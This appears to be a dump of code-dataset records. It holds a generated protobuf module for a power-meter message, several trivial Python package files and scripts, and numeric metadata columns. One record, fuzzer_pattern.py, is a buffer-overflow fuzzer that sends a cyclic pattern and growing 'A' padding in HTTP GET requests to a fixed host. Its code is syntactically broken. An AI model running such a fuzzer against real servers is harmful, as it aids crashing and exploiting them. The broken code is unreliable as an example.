serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppSum', full_name='xbospb.WattnodeState.EnergyAppSum', index=32,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppA', full_name='xbospb.WattnodeState.EnergyAppA', index=33,
number=34, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppB', full_name='xbospb.WattnodeState.EnergyAppB', index=34,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppC', full_name='xbospb.WattnodeState.EnergyAppC', index=35,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorAvg', full_name='xbospb.WattnodeState.PowerFactorAvg', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorA', full_name='xbospb.WattnodeState.PowerFactorA', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorB', full_name='xbospb.WattnodeState.PowerFactorB', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorC', full_name='xbospb.WattnodeState.PowerFactorC', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacSum', full_name='xbospb.WattnodeState.PowerReacSum', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacA', full_name='xbospb.WattnodeState.PowerReacA', index=41,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacB', full_name='xbospb.WattnodeState.PowerReacB', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacC', full_name='xbospb.WattnodeState.PowerReacC', index=43,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppSum', full_name='xbospb.WattnodeState.PowerAppSum', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppA', full_name='xbospb.WattnodeState.PowerAppA', index=45,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppB', full_name='xbospb.WattnodeState.PowerAppB', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppC', full_name='xbospb.WattnodeState.PowerAppC', index=47,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentA', full_name='xbospb.WattnodeState.CurrentA', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentB', full_name='xbospb.WattnodeState.CurrentB', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentC', full_name='xbospb.WattnodeState.CurrentC', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Demand', full_name='xbospb.WattnodeState.Demand', index=51,
number=52, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandMin', full_name='xbospb.WattnodeState.DemandMin', index=52,
number=53, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandMax', full_name='xbospb.WattnodeState.DemandMax', index=53,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandApp', full_name='xbospb.WattnodeState.DemandApp', index=54,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandA', full_name='xbospb.WattnodeState.DemandA', index=55,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandB', full_name='xbospb.WattnodeState.DemandB', index=56,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandC', full_name='xbospb.WattnodeState.DemandC', index=57,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time', full_name='xbospb.WattnodeState.time', index=58,
number=59, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=48,
serialized_end=2115,
)
_WATTNODESTATE.fields_by_name['EnergySum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergySumNR'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosSumNr'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAvgLN'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAvgLL'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltBC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['Freq'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegSumNR'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorAvg'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['Demand'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandMin'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandMax'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandApp'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandC'].message_type = nullabletypes__pb2._DOUBLE
DESCRIPTOR.message_types_by_name['WattnodeState'] = _WATTNODESTATE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
WattnodeState = _reflection.GeneratedProtocolMessageType('WattnodeState', (_message.Message,), dict(
DESCRIPTOR = _WATTNODESTATE,
__module__ = 'wattnode_pb2'
# @@protoc_insertion_point(class_scope:xbospb.WattnodeState)
))
_sym_db.RegisterMessage(WattnodeState)
# @@protoc_insertion_point(module_scope)
| 59.626866
| 3,681
| 0.76067
| 4,210
| 31,960
| 5.496675
| 0.074584
| 0.061536
| 0.055356
| 0.070006
| 0.729355
| 0.727929
| 0.727929
| 0.726762
| 0.708094
| 0.515406
| 0
| 0.048988
| 0.118586
| 31,960
| 535
| 3,682
| 59.738318
| 0.772488
| 0.006602
| 0
| 0.585271
| 1
| 0.003876
| 0.171345
| 0.132502
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011628
| 0
| 0.011628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76ad7e0d15716c0c9acafb3659c5dd4c5382ca6d
| 63
|
py
|
Python
|
forms/models/__init__.py
|
darkismus/kompassi
|
35dea2c7af2857a69cae5c5982b48f01ba56da1f
|
[
"CC-BY-3.0"
] | 13
|
2015-11-29T12:19:12.000Z
|
2021-02-21T15:42:11.000Z
|
forms/models/__init__.py
|
darkismus/kompassi
|
35dea2c7af2857a69cae5c5982b48f01ba56da1f
|
[
"CC-BY-3.0"
] | 23
|
2015-04-29T19:43:34.000Z
|
2021-02-10T05:50:17.000Z
|
forms/models/__init__.py
|
darkismus/kompassi
|
35dea2c7af2857a69cae5c5982b48f01ba56da1f
|
[
"CC-BY-3.0"
] | 11
|
2015-09-20T18:59:00.000Z
|
2020-02-07T08:47:34.000Z
|
from .form import Form
from .form_response import FormResponse
| 21
| 39
| 0.84127
| 9
| 63
| 5.777778
| 0.555556
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 40
| 31.5
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4f14767dc53cd58e79e62f6d296ddcb36351be1e
| 1,072
|
py
|
Python
|
fuzzer_pattern.py
|
JAYMONSECURITY/JMSec-Blog-Resources
|
61bcab0cbfceab8d46c039f5a5165b8f9da6737f
|
[
"MIT"
] | 2
|
2021-09-08T23:57:47.000Z
|
2022-02-15T09:58:36.000Z
|
fuzzer_pattern.py
|
JAYMONSECURITY/JMSec-Blog-Resources
|
61bcab0cbfceab8d46c039f5a5165b8f9da6737f
|
[
"MIT"
] | null | null | null |
fuzzer_pattern.py
|
JAYMONSECURITY/JMSec-Blog-Resources
|
61bcab0cbfceab8d46c039f5a5165b8f9da6737f
|
[
"MIT"
] | 2
|
2021-09-09T13:42:12.000Z
|
2022-02-15T23:39:02.000Z
|
#!/usr/share/python
import socket
#Fuzzear parametro GET
princi_buffer="GET "
buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae"
+"8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj"
+"9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9A"
+"p0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
fin_buffer=" HTTP/1.1\r\n\r\n"
while True:
buffer = buffer+"\x41"*100
fin_buffer = princi_buffer+buffer+fin_buffer
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.222.134", 80))
print "Lanzando buffer de %d caracteres" % len(buffer)
sock.send(fin_buffer)
sock.recv(1024)
sock.close()
exit()
| 44.666667
| 157
| 0.849813
| 73
| 1,072
| 12.369863
| 0.616438
| 0.039867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227964
| 0.079291
| 1,072
| 23
| 158
| 46.608696
| 0.68693
| 0.036381
| 0
| 0
| 0
| 0
| 0.666667
| 0.595238
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.055556
| null | null | 0.055556
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4f4a2f58b2efbce618dd9aa5640332600366d20c
| 85
|
py
|
Python
|
gammapy/makers/background/__init__.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | 155
|
2015-02-25T12:38:02.000Z
|
2022-03-13T17:54:30.000Z
|
gammapy/makers/background/__init__.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | 3,131
|
2015-01-06T15:36:23.000Z
|
2022-03-31T17:30:57.000Z
|
gammapy/makers/background/__init__.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | 158
|
2015-03-16T20:36:44.000Z
|
2022-03-30T16:05:37.000Z
|
from .fov import *
from .phase import *
from .reflected import *
from .ring import *
| 17
| 24
| 0.717647
| 12
| 85
| 5.083333
| 0.5
| 0.491803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188235
| 85
| 4
| 25
| 21.25
| 0.884058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
96c81aec84afa63d6b9dbf569516b695426355a7
| 26
|
py
|
Python
|
examples/minitwit/minitwit/__init__.py
|
sabikm9876/Dockers9876
|
5909e26fba86351063bd622cedf6a4c25eba2e79
|
[
"BSD-3-Clause"
] | 2
|
2017-11-22T01:23:35.000Z
|
2017-11-22T01:24:17.000Z
|
examples/minitwit/minitwit/__init__.py
|
sabikm9876/Dockers9876
|
5909e26fba86351063bd622cedf6a4c25eba2e79
|
[
"BSD-3-Clause"
] | null | null | null |
examples/minitwit/minitwit/__init__.py
|
sabikm9876/Dockers9876
|
5909e26fba86351063bd622cedf6a4c25eba2e79
|
[
"BSD-3-Clause"
] | 5
|
2018-04-02T04:13:30.000Z
|
2021-11-01T07:28:26.000Z
|
from .minitwit import app
| 13
| 25
| 0.807692
| 4
| 26
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
96e41654e9ead4f336205f2af7521f0f740a978e
| 121
|
py
|
Python
|
losses.py
|
aleXiehta/pytorch_mini_template
|
a0d51befa6cf6ac3111f1ca36ff682be004d5686
|
[
"MIT"
] | null | null | null |
losses.py
|
aleXiehta/pytorch_mini_template
|
a0d51befa6cf6ac3111f1ca36ff682be004d5686
|
[
"MIT"
] | null | null | null |
losses.py
|
aleXiehta/pytorch_mini_template
|
a0d51befa6cf6ac3111f1ca36ff682be004d5686
|
[
"MIT"
] | 1
|
2020-12-25T06:09:14.000Z
|
2020-12-25T06:09:14.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
def my_loss(y_hat, y):
raise NotImplementedError
| 17.285714
| 31
| 0.77686
| 21
| 121
| 4.380952
| 0.619048
| 0.358696
| 0.282609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165289
| 121
| 6
| 32
| 20.166667
| 0.910891
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c05668de5b064d1e429c87f34b1c93e043326ea
| 107
|
py
|
Python
|
utils/__init__.py
|
YooshinCho/pytorch_Convolutional_Unit_Optimization
|
5e405eb410a7cf07839b1dcaf8fb0a422f07d1a7
|
[
"MIT"
] | 8
|
2021-09-11T01:30:47.000Z
|
2022-03-14T06:06:39.000Z
|
utils/__init__.py
|
YooshinCho/pytorch_Convolutional_Unit_Optimization
|
5e405eb410a7cf07839b1dcaf8fb0a422f07d1a7
|
[
"MIT"
] | 1
|
2021-09-10T22:59:39.000Z
|
2021-09-12T09:11:39.000Z
|
utils/__init__.py
|
YooshinCho/pytorch_Convolutional_Unit_Optimization
|
5e405eb410a7cf07839b1dcaf8fb0a422f07d1a7
|
[
"MIT"
] | 1
|
2021-08-24T02:21:10.000Z
|
2021-08-24T02:21:10.000Z
|
from __future__ import absolute_import
from .tools import *
from .logger import *
from .function import *
| 17.833333
| 38
| 0.785047
| 14
| 107
| 5.642857
| 0.5
| 0.379747
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158879
| 107
| 5
| 39
| 21.4
| 0.877778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c0c263c940bab3dedc935852a26a7159157adc7
| 41
|
py
|
Python
|
txbillsearch/__init__.py
|
EdVinyard/TxBillSearch
|
7f4a70dac84d4209b2391a42c72aab0882b258aa
|
[
"MIT"
] | null | null | null |
txbillsearch/__init__.py
|
EdVinyard/TxBillSearch
|
7f4a70dac84d4209b2391a42c72aab0882b258aa
|
[
"MIT"
] | 3
|
2020-03-24T17:48:03.000Z
|
2021-02-02T22:18:00.000Z
|
txbillsearch/__init__.py
|
EdVinyard/TxBillSearch
|
7f4a70dac84d4209b2391a42c72aab0882b258aa
|
[
"MIT"
] | null | null | null |
from .txbillsearch import search, Search
| 20.5
| 40
| 0.829268
| 5
| 41
| 6.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 41
| 1
| 41
| 41
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c13b616b89ba69ebeb7ba022e1082c702bd7e7c
| 33
|
py
|
Python
|
scrapers/test.py
|
aldeano19/databucket
|
8a1281f66cf1e545e03fec248dfecee8f3de4b6b
|
[
"Apache-2.0"
] | null | null | null |
scrapers/test.py
|
aldeano19/databucket
|
8a1281f66cf1e545e03fec248dfecee8f3de4b6b
|
[
"Apache-2.0"
] | null | null | null |
scrapers/test.py
|
aldeano19/databucket
|
8a1281f66cf1e545e03fec248dfecee8f3de4b6b
|
[
"Apache-2.0"
] | null | null | null |
import bs4
print bs4.__version__
| 11
| 21
| 0.848485
| 5
| 33
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 0.121212
| 33
| 3
| 21
| 11
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
8c18f05b15aa8081fe729642e5f20851bab1b131
| 184
|
py
|
Python
|
examples/timecode.py
|
voiski/pytago
|
3be793d2381c2353d59b3152ae6bf6617eb2768d
|
[
"MIT"
] | 206
|
2021-06-24T16:16:13.000Z
|
2022-03-31T07:44:17.000Z
|
examples/timecode.py
|
voiski/pytago
|
3be793d2381c2353d59b3152ae6bf6617eb2768d
|
[
"MIT"
] | 13
|
2021-06-24T17:51:36.000Z
|
2022-02-23T10:07:17.000Z
|
examples/timecode.py
|
voiski/pytago
|
3be793d2381c2353d59b3152ae6bf6617eb2768d
|
[
"MIT"
] | 14
|
2021-06-26T02:19:45.000Z
|
2022-03-30T03:02:49.000Z
|
import time
def main():
print(time.time())
print(time.time_ns())
print(time.ctime(time.time()))
print(time.ctime(1000000000))
if __name__ == '__main__':
main()
| 14.153846
| 34
| 0.619565
| 24
| 184
| 4.375
| 0.416667
| 0.342857
| 0.247619
| 0.32381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068027
| 0.201087
| 184
| 12
| 35
| 15.333333
| 0.646259
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
